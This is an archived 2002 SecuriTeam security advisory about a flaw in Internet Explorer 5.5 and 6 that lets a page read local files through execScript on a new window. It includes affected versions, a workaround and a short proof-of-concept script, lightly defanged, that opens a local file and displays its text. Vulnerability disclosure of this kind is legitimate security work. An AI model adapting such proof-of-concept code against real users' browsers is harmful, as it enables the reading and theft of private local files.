[NT] More Reading of Local Files Vulnerabilities in MSIE
From: support@securiteam.comDate: 01/14/02
- Previous message: support@securiteam.com: "[UNIX] Pine URL Handler Allows Execution of Embedded Commands"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Mon, 14 Jan 2002 08:53:11 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
More Reading of Local Files Vulnerabilities in MSIE
------------------------------------------------------------------------
SUMMARY
There is a security vulnerability in IE 5.5 and 6 (probably other versions
as well) which allows reading and sending of local files. The problem lies
in the fact that you are able to access a local file's domain by calling
the execScript function on a newly created window. The sample exploit
provided can only read browser readable files however it is highly likely
that reading binary files is possible as well (By attaching an event to
the domain that calls the HTTP XML component, witch itself at the point of
writing is still vulnerable as well). In order for this exploit to work,
the file name must be known.
Further, if your exploit page is modified so that a website is opened
rather than a local file, the calling script can access the properties of
the website.
(NOTE, this vulnerability is similar in concept to:
<http://www.securiteam.com/windowsntfocus/6W00D2K3FS.html> Internet
Explorer 6 Allows Local File Reading (XMLHTTP))
DETAILS
Vulnerable systems:
Internet Explorer version 6 (Windows XP with all patches installed)
Internet Explorer version 5.5 (Windows ME)
Example:
(NOTE: SCRIPT's 'I' letter has been replaced with a !)
<scr!pt language="javascript">
var extDoc
function doIt() {
// open an external window and store the reference to it in extDoc
extDoc =
document.open('file:///C:/jelmer.txt','jelmer','height=200,width=400,status=no,toolbar=no,menubar=no,location=no');
// wait 2 seconds for the external window to load
// then execute some javascript code that displays the body of the
document
cmd = 'extDoc.execScript("alert(document.body.innerText)",
"Jscript");';
setTimeout(cmd,2000);
}
</script>
Workaround:
Disable active scripting.
ADDITIONAL INFORMATION
The information has been provided by <mailto:jelmer@kuperus.xs4all.nl>
jelmer.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Pine URL Handler Allows Execution of Embedded Commands"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
